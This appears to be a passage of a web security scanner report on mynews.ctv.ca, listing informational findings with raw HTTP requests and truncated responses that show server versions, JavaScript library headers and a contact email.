HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:49:53 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www1 ETag: 966ead87df812304c5c6 Last-Modified: Sat, 20 Nov 2010 04:49:53 GMT Expires: Sat, 20 Nov 2010 05:49:53 GMT Cache-Control: private,max-age=3600, must-revalidate Vary: Accept-Encoding Content-Type: text/javascript;charset X-Cache-Lookup: MISS from www1.filemobile.com:80 Via: 1.1 www1.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 175174 /************************ /* SabreTooth 5 JavaScript library loader */ /* */ /* ...[SNIP]... v1.7.0, Fri Jan 19 19:16:36 CET 2007 // Copyright (c) 2005, 2006 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005, 2006 Sammi Williams (http://www.oriontransfer // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/ if(typeof Effect == 'undefined') t ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /services/jslibrary/1.1 |
GET /services/jslibrary/1.1 HTTP/1.1 Accept: */* Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:03 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 ETag: 29ea00ac8be0e3d857ca Last-Modified: Sat, 20 Nov 2010 04:52:03 GMT Expires: Sat, 20 Nov 2010 05:52:03 GMT Cache-Control: private,max-age=3600, must-revalidate Vary: Accept-Encoding Content-Type: text/javascript;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 229696 /************************ /* SabreTooth 5 JavaScript library loader */ /* */ /* ...[SNIP]... v1.8.1, Thu Jan 03 22:07:12 -0500 2008 // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/ if(Object.isUndefined thr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <p style="margin-top: 5px; margin-left: 10px">e.g. yourname@yourdomain.com</p> ...[SNIP]... <a href="mailto:mynews@ctv.ca">mynews@ctv.ca</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://mynews.ctv.ca |
Path: | /services/cssloader |
GET /services/cssloader?id Accept: */* Referer: http://www.ctv.ca/generic Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 04:49:53 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www1 ETag: 7b743de4c1d3f389c8fe Last-Modified: Sat, 20 Nov 2010 04:49:53 GMT Expires: Sat, 20 Nov 2010 04:59:53 GMT Cache-Control: private,max-age=600 Vary: Accept-Encoding Content-Type: text/css;charset=utf-8 X-Cache-Lookup: MISS from www1.filemobile.com:80 Via: 1.1 www1.filemobile.com:80 (squid/2.7.STABLE3) Connection: close Content-Length: 1337 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FileM ...[SNIP]... |